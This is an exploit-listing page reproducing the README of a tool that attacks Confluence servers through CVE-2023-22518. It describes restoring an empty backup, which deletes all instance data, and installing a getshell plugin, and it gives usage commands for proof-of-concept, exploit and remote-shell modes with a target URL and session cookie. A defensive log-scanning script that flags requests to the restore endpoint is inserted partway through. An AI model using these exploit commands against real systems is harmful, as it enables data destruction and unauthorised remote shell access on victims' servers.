## https://sploitus.com/exploit?id=B3368981-8F94-55C2-A696-DAAC86044700
# CVE-2023-22518

Confluence CVE-2023-22518

## Description

+ `xmlexport-20231127-071916-1.zip`: an empty Confluence backup file. **Restoring an empty backup causes all data to be lost**!!!
+ The backup file can be swapped for your own; just place it in the same directory as the script.
+ `shellplug.jar`: getshell plugin, taken from https://github.com/youcannotseemeagain/CVE-2023-22515_RCE
+ The endpoint for exporting the backup file, `/setup/setup-restore.action`, requires a logged-in session with sufficient permissions.
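
For defenders, any request that reaches the restore endpoint named in the list above is worth alerting on, because a restore replaces the instance's data. The following is an added example, not code from this repository: it scans web access-log lines for restore actions. The combined log format, the sample lines and the `setup-restore*.action` name pattern are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Last path segment such as setup-restore.action. Matching the name stem under
# any directory prefix is an assumption of this example.
RESTORE_RE = re.compile(r'/setup-restore[\w-]*\.action$', re.IGNORECASE)


def normalise_path(target):
    """Decode the path and drop the query string and ;param suffixes."""
    path = unquote(urlsplit(target).path)
    segments = [seg.split(';', 1)[0] for seg in path.split('/')]
    return re.sub(r'/{2,}', '/', '/'.join(segments))


def find_restore_requests(lines):
    """Return one finding per request whose path is a restore action."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalise_path(m['target'])
        if not RESTORE_RE.search(path):
            continue
        status = int(m['status'])
        # A POST answered with 2xx/3xx was accepted; other hits still need review.
        severity = 'high' if m['method'] == 'POST' and status < 400 else 'review'
        findings.append({'ip': m['ip'], 'time': m['ts'], 'method': m['method'],
                         'path': path, 'status': status, 'severity': severity})
    return findings


# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '198.51.100.23 - - [01/Jan/2024:10:00:01 +0000] "GET /setup/setup%2Drestore.action;x=1 HTTP/1.1" 403 312',
    '198.51.100.23 - - [01/Jan/2024:10:00:09 +0000] "POST /setup/setup-restore.action HTTP/1.1" 200 5120',
    '203.0.113.8 - alice [01/Jan/2024:10:01:00 +0000] "GET /dashboard.action HTTP/1.1" 200 20480',
    '203.0.113.8 - alice [01/Jan/2024:10:02:00 +0000] "GET /search?q=/setup-restore.action HTTP/1.1" 200 900',
]

if __name__ == '__main__':
    for finding in find_restore_requests(SAMPLE_LOG):
        print(finding)
```

The path is normalised before matching so that percent-encoding or `;` path parameters do not hide the request, and a query string that merely mentions the endpoint is not flagged.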

## Usage

```powershell
python .\CVE-2023-22518.py -h

    @Auth: C1ph3rX13
    @Blog: https://c1ph3rx13.github.io
    @Note: 代码仅供学习使用，请勿用于其他用途

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Url
  -id JSESSIONID, --jsessionid JSESSIONID
                        JSESSIONID
  --timeout TIMEOUT     Timeout (Default: 30 Seconds)
  --proxy PROXY         Proxy

```

### POC

```powershell
python .\CVE-2023-22518.py poc -t http://IP:Port
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-poc.png)

### Exp

```powershell
# Cookie: JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py exp -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-exp.png)

### Shell

```powershell
# Cookie: JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py shell -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-shell.png)

## Thanks

https://github.com/ForceFledgling/CVE-2023-22518

https://github.com/sanjai-AK47/CVE-2023-22518